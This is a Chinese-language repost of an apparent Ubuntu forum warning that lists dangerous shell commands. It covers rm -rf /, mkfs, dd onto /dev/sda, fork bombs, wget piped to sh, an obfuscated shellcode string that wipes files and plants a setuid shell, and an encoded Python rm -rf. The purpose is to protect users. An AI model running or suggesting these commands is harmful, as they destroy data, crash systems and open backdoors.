最近Ubuntu官方論壇發出了官方通告, 列出下列危險命令, 告誡用戶不要執行, 並對隨意張貼下列命令的帳號處以直接封號的處罰.
再次聲明, 請不要執行下列或類似下列的命令, 這些命令將會對你的計算機造成嚴重影響.
下列命令會刪除所有文件, 刪除當前目錄, 刪除當前目錄下面的文件.
代碼:
rm -rf /
rm -rf .
rm -rf *
下列命令會摧毀整個文件系統, 重建分區.
代碼:
mkfs
mkfs.ext3
mkfs.anything
下列命令會清空整個硬盤.
代碼:
any_command > /dev/sda
dd if=something ōf=/dev/sda
下列命令會啟動大量進程, 導致系統無法響應, 只能硬重啟機器, 可能會導致數據損害.
代碼:
:(){:|:&};:
In Perl
代碼:
fork while fork
不要執行你不信任的人提供的shell腳本, 裡面可能含有危險的命令和腳本, 不要隨意解壓別人提供的壓縮包, 也許看起來很小, 結果解壓出來會塞滿整個硬盤.
代碼:
wget http://some_place/some_file
sh ./some_file
代碼:
wget http://some_place/some_file -O- | sh
不要編譯運行別人提供的不明代碼
代碼:
char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";
To the new or even lightly experienced computer user, this looks like the "hex code gibberish stuff" that is so typical of a safe proof-of-concept. However, this actually runs rm -rf ~ / & which will destroy your home directory as a regular user, or all files as root. If you could see this command in the hex string, then you don't need to be reading this announcement. Otherwise, remember that these things can come in very novel forms -- watch out.
Again, recall these are not at all comprehensive and you should not use this as a checklist to determine if a command is dangerous or not!
For example, 30 seconds in Python yields something like this:
代碼:
python -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))'
